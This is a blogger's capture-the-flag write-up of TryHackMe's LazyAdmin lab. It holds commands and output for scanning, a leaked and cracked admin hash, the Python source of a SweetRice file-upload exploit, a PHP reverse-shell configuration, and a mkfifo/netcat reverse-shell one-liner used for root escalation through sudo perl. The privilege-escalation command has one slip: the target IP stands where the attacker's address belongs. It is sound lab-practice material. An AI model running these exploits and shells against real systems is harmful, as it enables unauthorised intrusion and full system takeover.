<!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>TryHackMe Writeup: LazyAdmin</title><style>
      * {
        font-family: Georgia, Cambria, "Times New Roman", Times, serif;
      }
      html, body {
        margin: 0;
        padding: 0;
      }
      h1 {
        font-size: 50px;
        margin-bottom: 17px;
        color: #333;
      }
      h2 {
        font-size: 24px;
        line-height: 1.6;
        margin: 30px 0 0 0;
        margin-bottom: 18px;
        margin-top: 33px;
        color: #333;
      }
      h3 {
        font-size: 30px;
        margin: 10px 0 20px 0;
        color: #333;
      }
      header {
        width: 640px;
        margin: auto;
      }
      section {
        width: 640px;
        margin: auto;
      }
      section p {
        margin-bottom: 27px;
        font-size: 20px;
        line-height: 1.6;
        color: #333;
      }
      section img {
        max-width: 640px;
      }
      footer {
        padding: 0 20px;
        margin: 50px 0;
        text-align: center;
        font-size: 12px;
      }
      .aspectRatioPlaceholder {
        max-width: auto !important;
        max-height: auto !important;
      }
      .aspectRatioPlaceholder-fill {
        padding-bottom: 0 !important;
      }
      header,
      section[data-field=subtitle],
      section[data-field=description] {
        display: none;
      }
      </style></head><body><article class="h-entry">
<header>
<h1 class="p-name">TryHackMe Writeup: LazyAdmin</h1>
</header>
<section data-field="subtitle" class="p-summary">
The hacker Aleksey hacks TryHackMe’s LazyAdmin room. They assumed because the admin is “lazy,” that this would be easy. They were so wrong.
</section>
<section data-field="body" class="e-content">
<section name="bcfc" class="section section--body section--first"><div class="section-divider"><hr class="section-divider"></div><div class="section-content"><div class="section-inner sectionLayout--insetColumn"><h3 name="edf2" id="edf2" class="graf graf--h3 graf--leading graf--title">TryHackMe writeup: LazyAdmin</h3><p name="6a19" id="6a19" class="graf graf--p graf-after--h3">The <a href="https://www.tryhackme.com/room/lazyadmin" data-href="https://www.tryhackme.com/room/lazyadmin" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">LazyAdmin (2019)</a> room was pretty interesting. I assumed that the admin was “lazy,” and ergo this challenge would be easy as a consequence. I was wrong, and found myself relying on a previous hacker’s writeup regarding this challenge.</p><figure name="910c" id="910c" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*PmYen0AKo1QrCtXCtThLpQ.png" data-width="387" data-height="514" data-is-featured="true" src="https://cdn-images-1.medium.com/max/800/1*PmYen0AKo1QrCtXCtThLpQ.png"><figcaption class="imageCaption">Base Image: “Bastard Operator from Hell” and “Lil &amp; Put”</figcaption></figure><h3 name="83a7" id="83a7" class="graf graf--h3 graf-after--figure">Procedure</h3><h4 name="e3e8" id="e3e8" class="graf graf--h4 graf-after--h3">Network scanning</h4><p name="65f7" id="65f7" class="graf graf--p graf-after--h4">As with these boot2root machines, I booted up the LazyAdmin machine and began probing the machine. I ran an <code class="markup--code markup--p-code">nmap</code> scan with the following parameters:</p><p name="53ac" id="53ac" class="graf graf--p graf-after--p"><code class="markup--code markup--p-code"><strong class="markup--strong markup--p-strong">$ nmap -sT -A -v -Pn -O -p- -oX tcp_scan.xml &lt;target ip address&gt;</strong></code></p><p name="08ef" id="08ef" class="graf graf--p graf-after--p">The scan reported an OpenSSH service on port 22 and an Apache webserver on port 80.</p><h4 name="3882" id="3882" class="graf graf--h4 graf-after--p">Probing the webserver</h4><p name="a933" id="a933" class="graf graf--p graf-after--h4">I then ran the <code class="markup--code markup--p-code">gobuster</code> tool to brute-force directories and discovered a sub-directory called <code class="markup--code markup--p-code">/content</code>. Browsing to the <code class="markup--code markup--p-code">/content</code> sub-directory, I figured out that the webserver was running some content management system called “SweetRice,” as shown below:</p><figure name="9cd9" id="9cd9" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*hs7Le0cYX_C8kV8V30Xtog.png" data-width="710" data-height="316" src="https://cdn-images-1.medium.com/max/800/1*hs7Le0cYX_C8kV8V30Xtog.png"><figcaption class="imageCaption">The contents of http://&lt;target ip address&gt;/content</figcaption></figure><p name="16d0" id="16d0" class="graf graf--p graf-after--figure">So I then used <code class="markup--code markup--p-code">searchsploit</code> to get a list of exploits related to the SweetRice CMS:</p><pre name="2747" id="2747" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">└─$ searchsploit sweetrice</strong> <br> [...]</pre><pre name="a19b" id="a19b" class="graf graf--pre graf-after--pre"> Exploit Title | Path<br> — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -<br>SweetRice 0.5.3 — Remote File Inclusion | php/webapps/10246.txt<br>SweetRice 0.6.7 — Multiple Vulnerabilities | php/webapps/15413.txt<br>SweetRice 1.5.1 — Arbitrary File Download | php/webapps/40698.py<br>SweetRice 1.5.1 — Arbitrary File Upload | php/webapps/40716.py<br>SweetRice 1.5.1 — Backup Disclosure | php/webapps/40718.txt<br>SweetRice 1.5.1 — Cross-Site Request Forgery | php/webapps/40692.html<br>SweetRice 1.5.1 — Cross-Site Request Forgery / PHP Code Execution | php/webapps/40700.html<br>SweetRice &lt; 0.6.4 — ‘FCKeditor’ Arbitrary File Upload | php/webapps/14184.txt</pre><pre name="530b" id="530b" class="graf graf--pre graf-after--pre">  [...]</pre><p name="975a" id="975a" class="graf graf--p graf-after--pre">I decided to try and exploit the <em class="markup--em markup--p-em">SweetRice 1.5.1 — Backup Disclosure </em>exploit first, so <code class="markup--code markup--p-code">cat</code>’d out the instructions to running the exploit:</p><pre name="b948" id="b948" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">└─$ cat /usr/share/exploitdb/exploits/php/webapps/40718.txt</strong><br>Title: SweetRice 1.5.1 — Backup Disclosure<br>Application: SweetRice<br>Versions Affected: 1.5.1<br>Vendor URL: <a href="http://www.basic-cms.org/" data-href="http://www.basic-cms.org/" class="markup--anchor markup--pre-anchor" rel="nofollow noopener" target="_blank">http://www.basic-cms.org/</a><br>Software URL: <a href="http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip" data-href="http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip" class="markup--anchor markup--pre-anchor" rel="nofollow noopener" target="_blank">http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip</a><br>Discovered by: Ashiyane Digital Security Team<br>Tested on: Windows 10<br>Bugs: Backup Disclosure<br>Date: 16-Sept-2016</pre><pre name="2518" id="2518" class="graf graf--pre graf-after--pre">Proof of Concept :</pre><pre name="72c3" id="72c3" class="graf graf--pre graf-after--pre">You can access to all mysql backup and download them from this directory.<br>http://localhost/inc/mysql_backup</pre><pre name="2b67" id="2b67" class="graf graf--pre graf-after--pre">and can access to website files backup from:<br>http://localhost/SweetRice-transfer.zip</pre><p name="aec9" id="aec9" class="graf graf--p graf-after--pre">Interesting. So I decided to type the following out into my browser:</p><pre name="5e00" id="5e00" class="graf graf--pre graf-after--p">(#1) http://&lt;target ip address&gt;/content/inc/mysql_backup<br>(#2) http://&lt;target ip address&gt;/content/SweetRice-transfer.zip</pre><p name="3f34" id="3f34" class="graf graf--p graf-after--pre">Link #2 returned a “file not found” 404 error, but Link #1 gave me what looks like a SQL dump. So, naturally, I downloaded it and examined it with a text editor programme. I found an interesting entry on line 79:</p><pre name="704b" id="704b" class="graf graf--pre graf-after--p">[ ... snip ... ]</pre><pre name="9cf3" id="9cf3" class="graf graf--pre graf-after--pre">14 =&gt; ‘INSERT INTO `% — %_options` VALUES(\’1\’,\’global_setting\’,\’a:17:{s:4:\\”name\\”;s:25:\\”Lazy Admin&amp;#039;s Website\\”;s:6:\\”author\\”;s:10:\\”Lazy Admin\\”;s:5:\\”title\\”;s:0:\\”\\”;s:8:\\”keywords\\”;s:8:\\”Keywords\\”;s:11:\\”description\\”;s:11:\\”Description\\”;s:5:<strong class="markup--strong markup--pre-strong">\\”admin\\”;s:7:\\”manager\\”;s:6:\\”passwd\\”;s:32:\\”42f749ade7f9e195bf475f37a44cafcb\\”</strong>;s:5:\\”close\\”;i:1;s:9:\\”close_tip\\”;s:454:\\”&lt;p&gt;Welcome to SweetRice — Thank your for install SweetRice as your website management system.&lt;/p&gt;&lt;h1&gt;This site is building now , please come late.&lt;/h1&gt;&lt;p&gt;If you are the webmaster,please go to Dashboard -&gt; General -&gt; Website setting &lt;/p&gt;&lt;p&gt;and uncheck the checkbox \\”Site close\\” to open your website.&lt;/p&gt;&lt;p&gt;More help at &lt;a href=\\&quot;<a href="http://www.basic-cms.org/docs/5-things-need-to-be-done-when-SweetRice-installed/%5C%5C" data-href="http://www.basic-cms.org/docs/5-things-need-to-be-done-when-SweetRice-installed/\\" class="markup--anchor markup--pre-anchor" rel="nofollow noopener" target="_blank">http://www.basic-cms.org/docs/5-things-need-to-be-done-when-SweetRice-installed/\\</a>&quot;&gt;Tip for Basic CMS SweetRice installed&lt;/a&gt;&lt;/p&gt;\\”;s:5:\\”cache\\”;i:0;s:13:\\”cache_expired\\”;i:0;s:10:\\”user_track\\”;i:0;s:11:\\”url_rewrite\\”;i:0;s:4:\\”logo\\”;s:0:\\”\\”;s:5:\\”theme\\”;s:0:\\”\\”;s:4:\\”lang\\”;s:9:\\”en-us.php\\”;s:11:\\”admin_email\\”;N;}\’,\’1575023409\’);’,</pre><pre name="0e84" id="0e84" class="graf graf--pre graf-after--pre">[ ... snip ... ]</pre><p name="c735" id="c735" class="graf graf--p graf-after--pre">This looks like it contains information for the configuration of the administrator panel. Eyeballing the SQL entry, I see:</p><pre name="8882" id="8882" class="graf graf--pre graf--startsWithDoubleQuote graf-after--p">”admin\\”;s:7:\\”manager\\”;s:6:\\”passwd\\”;s:32:\\”42f749ade7f9e195bf475f37a44cafcb\\”</pre><p name="ce29" id="ce29" class="graf graf--p graf-after--pre">It seems that the username is <code class="markup--code markup--p-code">manager</code> and the password is the hash <code class="markup--code markup--p-code">42f749ade7f9e195bf475f37a44cafcb</code>. I used <a href="https://crackstation.net/" data-href="https://crackstation.net/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">CrackStation (n.d.)</a> to crack the hash, and got the result of <code class="markup--code markup--p-code">Password123</code>.</p><p name="69e0" id="69e0" class="graf graf--p graf-after--p">Given that this room is called “LazyAdmin,” I tried to use the manager and Pasword123 username and password combination to login to the SSH service:</p><pre name="a38a" id="a38a" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">└─$ ssh manager@&lt;target ip address&gt; </strong><br>The authenticity of host ‘&lt;target ip address&gt; (&lt;target ip address&gt;)’ can’t be established.<br>ED25519 key fingerprint is SHA256:gIHwIzi5a1G1WvkLMxJuFhSXiUnHy58kdQUcxmC6rIQ.<br>This host key is known by the following other names/addresses:<br> ~/.ssh/known_hosts:80: [hashed name]<br>Are you sure you want to continue connecting (yes/no/[fingerprint])? yes<br>Warning: Permanently added ‘&lt;target ip address&gt;’ (ED25519) to the list of known hosts.<br>manager@&lt;target ip address&gt;’s password: <strong class="markup--strong markup--pre-strong">[Password123]</strong><br>Permission denied, please try again.<br>manager@&lt;target ip address&gt;’s password: <strong class="markup--strong markup--pre-strong">[Password123]</strong><br>Permission denied, please try again.<br>manager@&lt;target ip address&gt;’s password: <strong class="markup--strong markup--pre-strong">[Password123]</strong><br>manager@&lt;target ip address&gt;: Permission denied (publickey,password).</pre><p name="0742" id="0742" class="graf graf--p graf-after--pre">Well, so much for my intuition 😋</p><h4 name="5b13" id="5b13" class="graf graf--h4 graf-after--p">File upload exploit</h4><p name="1c4a" id="1c4a" class="graf graf--p graf-after--h4">So I suppose that I should focus on exploiting the <em class="markup--em markup--p-em">SweetRice</em> web application. I tried monkeying around with the admin panel without any progress. So, looking back at <em class="markup--em markup--p-em">SearchSploit</em>’s results, I noticed another exploit called “SweetRice 1.5.1 — Arbitrary File Upload,” which I realised that I can use to upload a web-shell onto the web server.</p><p name="12ff" id="12ff" class="graf graf--p graf-after--p">So I decided to run the script, and got the following error:</p><pre name="b776" id="b776" class="graf graf--pre graf-after--p">[ … snip … ]</pre><pre name="5629" id="5629" class="graf graf--pre graf-after--pre">Enter The Target URL(Example : localhost.com) : http://&lt;target ip address&gt;/content/<br>Traceback (most recent call last):<br> File “exploit.py”, line 37, in &lt;module&gt;<br> host = input(“Enter The Target URL(Example : localhost.com) : “)<br> File “&lt;string&gt;”, line 1<br> http://&lt;target ip address&gt;/content/<br> ^<br>SyntaxError: invalid syntax</pre><p name="50dc" id="50dc" class="graf graf--p graf-after--pre">Alright. Let’s take a look at the source code:</p><pre name="70ee" id="70ee" class="graf graf--pre graf-after--p">[ ... snip ... ]</pre><pre name="8046" id="8046" class="graf graf--pre graf-after--pre"># Get Host &amp; User &amp; Pass &amp; filename<br>host = input(“Enter The Target URL(Example : localhost.com) : “)<br>username = input(“Enter Username : “)<br>password = input(“Enter Password : “)<br>filename = input(“Enter FileName (Example:.htaccess,shell.php5,index.html) : “)<br>file = {‘upload[]’: open(filename, ‘rb’)}</pre><pre name="68d2" id="68d2" class="graf graf--pre graf-after--pre">payload = {<br>    ‘user’:username,<br>    ‘passwd’:password,<br>    ‘rememberMe’:’’<br>}</pre><pre name="c7a1" id="c7a1" class="graf graf--pre graf-after--pre">with session() as r:<br>    login = r.post(‘http://&#39; + host + ‘/as/?type=signin’, data=payload)<br>    success = ‘Login success’<br>    if login.status_code == 200:<br>        print(“[+] Sending User&amp;Pass…”)<br>            if login.text.find(success) &gt; 1:<br>                print(“[+] Login Succssfully…”)<br>            else:<br>               print(“[-] User or Pass is incorrent…”)<br>               print(“Good Bye…”)<br>               exit()<br>               pass<br>            pass<br>    uploadfile = r.post(‘<a href="http://%27" data-href="http://&#39;" class="markup--anchor markup--pre-anchor" rel="nofollow noopener" target="_blank">http://’</a> + host + ‘/as/?type=media_center&amp;mode=upload’, files=file)<br>    if uploadfile.status_code == 200:<br>        print(“[+] File Uploaded…”)<br>        print(“[+] URL : http://” + host + “/attachment/” + filename)<br>        pass</pre><p name="a46d" id="a46d" class="graf graf--p graf-after--pre">Two important changes need to be made:</p><ul class="postList"><li name="c96b" id="c96b" class="graf graf--li graf-after--p">First, when the script asks for the <code class="markup--code markup--li-code">host</code>, <code class="markup--code markup--li-code">username</code>, <code class="markup--code markup--li-code">password</code> and <code class="markup--code markup--li-code">filename</code>, the <code class="markup--code markup--li-code">input()</code> function needs to be changed to <code class="markup--code markup--li-code">raw_input()</code></li><li name="a0ea" id="a0ea" class="graf graf--li graf-after--li">Second, when inputting the <code class="markup--code markup--li-code">host</code>, only put in the <code class="markup--code markup--li-code">&lt;target ip address&gt;/&lt;sweetrice directory&gt;</code> minus the <code class="markup--code markup--li-code">http://</code> bit. The script’s author already set to send web requests with the <code class="markup--code markup--li-code">http://</code> prefix, and adding another “http://” will confuse the exploit script.</li></ul><p name="909a" id="909a" class="graf graf--p graf-after--li">Now I just need to pick and configure a web shell. I will go with <em class="markup--em markup--p-em">Pentest Monkey’s Reverse Shell</em>, which is located at:</p><p name="8e38" id="8e38" class="graf graf--p graf-after--p"><code class="markup--code markup--p-code">/usr/share/webshells/php/php-reverse-shell.php</code></p><p name="b371" id="b371" class="graf graf--p graf-after--p">on Kali Linux. I set the following configurations:</p><pre name="7159" id="7159" class="graf graf--pre graf-after--p">[ ... snip ... ]</pre><pre name="3cca" id="3cca" class="graf graf--pre graf-after--pre">set_time_limit (0);<br>$VERSION = “1.0”;<br>$ip = ‘&lt;my attackbox ip address&gt;’; // CHANGE THIS<br>$port = 4444; // CHANGE THIS<br>$chunk_size = 1400;<br>$write_a = null;</pre><pre name="e786" id="e786" class="graf graf--pre graf-after--pre">[ ... snip ... ]</pre><p name="d287" id="d287" class="graf graf--p graf-after--pre">Run the exploit, and…</p><pre name="2c32" id="2c32" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">└─$ python exploit.py</strong></pre><pre name="a24a" id="a24a" class="graf graf--pre graf-after--pre">Enter The Target URL(Example : localhost.com) : &lt;target ip address&gt;/content<br>Enter Username : manager<br>Enter Password : Password123 <br>Enter FileName (Example:.htaccess,shell.php5,index.html) : shell.php5<br>[+] Sending User&amp;Pass…<br>[+] Login Succssfully…<br>[+] File Uploaded…<br>[+] URL : http://&lt;target ip address&gt;/content/attachment/shell.php5</pre><p name="40fc" id="40fc" class="graf graf--p graf-after--pre">I just need to setup a netcat listener and requested the php script through my web browser:</p><pre name="35c5" id="35c5" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">└─$ nc -l -n -v -p 4444</strong><br>listening on [any] 4444 …</pre><pre name="9110" id="9110" class="graf graf--pre graf-after--pre">[ … requests the php shell …]</pre><pre name="7807" id="7807" class="graf graf--pre graf-after--pre">connect to [&lt;attackbox ip address&gt;] from (UNKNOWN) [&lt;target ip address&gt;] 57614<br>Linux THM-Chal 4.15.0–70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux<br> 00:17:45 up 1:32, 0 users, load average: 0.00, 0.00, 0.00<br>USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT<br>uid=33(www-data) gid=33(www-data) groups=33(www-data)<br>/bin/sh: 0: can’t access tty; job control turned off<br><strong class="markup--strong markup--pre-strong">$ whoami</strong><br>www-data</pre><p name="b2fe" id="b2fe" class="graf graf--p graf-after--pre">And I’m in!</p><h4 name="78cd" id="78cd" class="graf graf--h4 graf-after--p">Flags and post-initial access</h4><p name="e661" id="e661" class="graf graf--p graf-after--h4">I will proceed by getting the user flag and working out a way to get root privileges:</p><pre name="9a95" id="9a95" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">$ cd /home</strong><br><strong class="markup--strong markup--pre-strong">$ ls</strong><br>itguy<br><strong class="markup--strong markup--pre-strong">$ cd itguy</strong><br><strong class="markup--strong markup--pre-strong">$ ls</strong><br>Desktop<br>Documents<br>Downloads<br>Music<br>Pictures<br>Public<br>Templates<br>Videos<br>backup.pl<br>examples.desktop<br>mysql_login.txt<br>user.txt<br><strong class="markup--strong markup--pre-strong">$ cat user.txt # &lt;- the user flag<br></strong><em class="markup--em markup--pre-em">[redacted]</em></pre><p name="aa4d" id="aa4d" class="graf graf--p graf-after--pre">Alright, this is good. But now I need to figure out how to get root. After experimenting with logging into the MySQL database with credentials given by <code class="markup--code markup--p-code">mysql_login.txt</code>, and after failing to get Linux Smart Enumeration (<a href="https://github.com/diego-treitos/linux-smart-enumeration" data-href="https://github.com/diego-treitos/linux-smart-enumeration" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Blanco, n.d.</a>) onto the system because of strict directory permisions, I decided to instead focus on getting root access via the <code class="markup--code markup--p-code">backup.pl</code> script. The contents of the script are:</p><pre name="e58d" id="e58d" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">$ cat backup.pl</strong><br>#!/usr/bin/perl</pre><pre name="69e4" id="69e4" class="graf graf--pre graf-after--pre">system(“sh”, “/etc/copy.sh”);</pre><p name="3263" id="3263" class="graf graf--p graf-after--pre">The <code class="markup--code markup--p-code">/etc/copy.sh</code> script looks interesting. Its contents are:</p><pre name="570b" id="570b" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">$ cat /etc/copy.sh</strong><br>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 192.168.0.190 5554 &gt;/tmp/f</pre><p name="9bf6" id="9bf6" class="graf graf--p graf-after--pre">I knew that I had to do something regarding this script to get root access, but I just could not put my finger on it. So, I tried researching these commands and eventually other writeups for a “hint.” I came across a writeup on this room by <a href="https://muirlandoracle.co.uk/2020/01/11/lazyadmin-write-up/" data-href="https://muirlandoracle.co.uk/2020/01/11/lazyadmin-write-up/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">“MurilandOracle” (2020)</a>, and decided to pretty much duplicate their technique:</p><pre name="1407" id="1407" class="graf graf--pre graf-after--p">[ ... target machine ... ]</pre><pre name="d8d2" id="d8d2" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">$ echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc &lt;target ip address&gt; 5554 &gt;/tmp/f” &gt; /etc/copy.sh</strong><br><strong class="markup--strong markup--pre-strong">$ sudo /usr/bin/perl /home/itguy/backup.pl</strong></pre><pre name="2201" id="2201" class="graf graf--pre graf-after--pre">[ ... attackbox ... ]</pre><pre name="f110" id="f110" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">└─$ nc -l -v -n -p 5554</strong><br>listening on [any] 5554 ...<br>connect to [&lt;attackbox ip address&gt;] from (UNKNOWN) [&lt;target ip address&gt;] 36926<br>/bin/sh: 0: can&#39;t access tty; job control turned off<br><strong class="markup--strong markup--pre-strong"># id</strong><br>uid=0(root) gid=0(root) groups=0(root)<br><strong class="markup--strong markup--pre-strong"># cat /root/root.txt # &lt;- the root flag</strong><br><em class="markup--em markup--pre-em">[redacted]</em></pre><h3 name="a96d" id="a96d" class="graf graf--h3 graf-after--pre">Summary</h3><p name="ab63" id="ab63" class="graf graf--p graf-after--h3">Despite the name, working out the flag here require a bit more skill than I was ready to dish out. I needed the help of <a href="https://muirlandoracle.co.uk/2020/01/11/lazyadmin-write-up/" data-href="https://muirlandoracle.co.uk/2020/01/11/lazyadmin-write-up/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">“MurilandOracle” (2020)</a>, and I need to practice more in order to ascend into elite hacker status.</p><p name="ec50" id="ec50" class="graf graf--p graf-after--p">It is also worth noting that recently, <a href="https://www.hackthebox.com/blog/It-is-Okay-to-Use-Writeups" data-href="https://www.hackthebox.com/blog/It-is-Okay-to-Use-Writeups" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">“ippsec” and “0xdf” (2022)</a> posited that beginners, such as myself, can reference writeups if they really are struggle to hack a simulation computer or network. I would add that one should try to hack a computer system on their own first before turning to a writeup. Also, be sure to give credit where credit is due if you decide to write up your own report ;-)</p><h4 name="38c8" id="38c8" class="graf graf--h4 graf-after--p">Lessons learnt</h4><ul class="postList"><li name="3fd8" id="3fd8" class="graf graf--li graf-after--h4">Exploits can sometimes break, so be sure to have a coding and debugging background to fix them ;-)</li><li name="0fc4" id="0fc4" class="graf graf--li graf-after--li">In absence of <code class="markup--code markup--li-code">nano</code>, <code class="markup--code markup--li-code">vim</code> or other terminal-based text editors, use <code class="markup--code markup--li-code">echo</code> to overwrite a file with <code class="markup--code markup--li-code">a+rwx</code> file permissions.</li><li name="483a" id="483a" class="graf graf--li graf-after--li">One should not rely too much on Linux Smart Enumeration (<a href="https://github.com/diego-treitos/linux-smart-enumeration" data-href="https://github.com/diego-treitos/linux-smart-enumeration" class="markup--anchor markup--li-anchor" rel="noopener" target="_blank">Blanco, n.d.</a>) or <em class="markup--em markup--li-em">Linux Exploit Suggester</em> (<a href="https://github.com/mzet-/linux-exploit-suggester" data-href="https://github.com/mzet-/linux-exploit-suggester" class="markup--anchor markup--li-anchor" rel="noopener" target="_blank">“mzet,” n.d.</a>). as sometimes directory permissions can be ultra restrictive.</li><li name="9a08" id="9a08" class="graf graf--li graf-after--li">Don’t underestimate “lazy” sysadmins as they can still be hard to r00t despite being lazy.</li></ul><h3 name="3b39" id="3b39" class="graf graf--h3 graf-after--li">Works cited</h3><p name="327f" id="327f" class="graf graf--p graf-after--h3">Blanco, D. (n.d.). <em class="markup--em markup--p-em">Linux Smart Enumeration: Linux enumeration tool for pentesting and CTFs with verbosity levels</em>. GitHub. Retrieved on Feb. 7, 2022 from: <a href="https://github.com/diego-treitos/linux-smart-enumeration" data-href="https://github.com/diego-treitos/linux-smart-enumeration" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://github.com/diego-treitos/linux-smart-enumeration</a></p><p name="d7da" id="d7da" class="graf graf--p graf-after--p">CrackStation (n.d.). Retrieved on Feb. 7, 2022 from: <a href="https://crackstation.net/" data-href="https://crackstation.net/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://crackstation.net/</a></p><p name="ebdf" id="ebdf" class="graf graf--p graf--startsWithDoubleQuote graf-after--p">“ippsec” and “0xdf” (2022). It is Okay to Use Writeups. HackTheBox. Retrieved on Feb. 7, 2022 from: <a href="https://www.hackthebox.com/blog/It-is-Okay-to-Use-Writeups" data-href="https://www.hackthebox.com/blog/It-is-Okay-to-Use-Writeups" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://www.hackthebox.com/blog/It-is-Okay-to-Use-Writeups</a></p><p name="43d2" id="43d2" class="graf graf--p graf--startsWithDoubleQuote graf-after--p">“MrSeth6797” (2019). LazyAdmin. TryHackMe. Retrieved on Feb. 7, 2022 from: <a href="https://www.tryhackme.com/room/lazyadmin" data-href="https://www.tryhackme.com/room/lazyadmin" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://www.tryhackme.com/room/lazyadmin</a></p><p name="ed1f" id="ed1f" class="graf graf--p graf--startsWithDoubleQuote graf-after--p">“MurilandOracle” (2020). <em class="markup--em markup--p-em">LazyAdmin — Write-up</em>. Retrieved on Feb. 7, 2022 from: <a href="https://muirlandoracle.co.uk/2020/01/11/lazyadmin-write-up/" data-href="https://muirlandoracle.co.uk/2020/01/11/lazyadmin-write-up/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://muirlandoracle.co.uk/2020/01/11/lazyadmin-write-up/</a></p><p name="0431" id="0431" class="graf graf--p graf--startsWithDoubleQuote graf-after--p graf--trailing">“mzet” (n.d.). <em class="markup--em markup--p-em">Linux privilege escalation auditing tool</em>. GitHub. Retrieved on Feb. 7, 2022 from: <a href="https://github.com/mzet-/linux-exploit-suggester" data-href="https://github.com/mzet-/linux-exploit-suggester" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://github.com/mzet-/linux-exploit-suggester</a></p></div></div></section><section name="6d82" class="section section--body section--last"><div class="section-divider"><hr class="section-divider"></div><div class="section-content"><div class="section-inner sectionLayout--insetColumn"><h3 name="5064" id="5064" class="graf graf--h3 graf--leading">🔈 🔈 Infosec Writeups is organizing its first-ever virtual conference and networking event. If you’re into Infosec, this is the coolest place to be, with 16 incredible speakers and 10+ hours of power-packed discussion sessions. <a href="https://iwcon.live/" data-href="https://iwcon.live/" class="markup--anchor markup--h3-anchor" rel="noopener" target="_blank">Check more details and register here.</a></h3><div name="b11f" id="b11f" class="graf graf--mixtapeEmbed graf-after--h3 graf--trailing"><a href="https://iwcon.live/" data-href="https://iwcon.live/" class="markup--anchor markup--mixtapeEmbed-anchor" title="https://iwcon.live/"><strong class="markup--strong markup--mixtapeEmbed-strong">IWCon2022 - Infosec WriteUps Virtual Conference</strong><br><em class="markup--em markup--mixtapeEmbed-em">Network With World&#39;s Best Infosec Professionals. Find How Cybersecurity Pros Achieved Success. Add New Skills to Your…</em>iwcon.live</a><a href="https://iwcon.live/" class="js-mixtapeImage mixtapeImage u-ignoreBlock" data-media-id="5d040835b75194a969ab6ed6377a19dc" data-thumbnail-img-id="0*bZ4kLRxbDhclBaUt" style="background-image: url(https://cdn-images-1.medium.com/fit/c/160/160/0*bZ4kLRxbDhclBaUt);"></a></div></div></div></section>
</section>
<footer><p>By <a href="https://medium.com/@EpsilonCalculus" class="p-author h-card">Aleksey</a> on <a href="https://medium.com/p/c5f0d113bec6"><time class="dt-published" datetime="2022-02-09T16:54:43.673Z">February 9, 2022</time></a>.</p><p><a href="https://medium.com/@EpsilonCalculus/lazyadmin-tryhackme-writeup-c5f0d113bec6" class="p-canonical">Canonical link</a></p><p>Exported from <a href="https://medium.com">Medium</a> on June 14, 2022.</p></footer></article></body></html>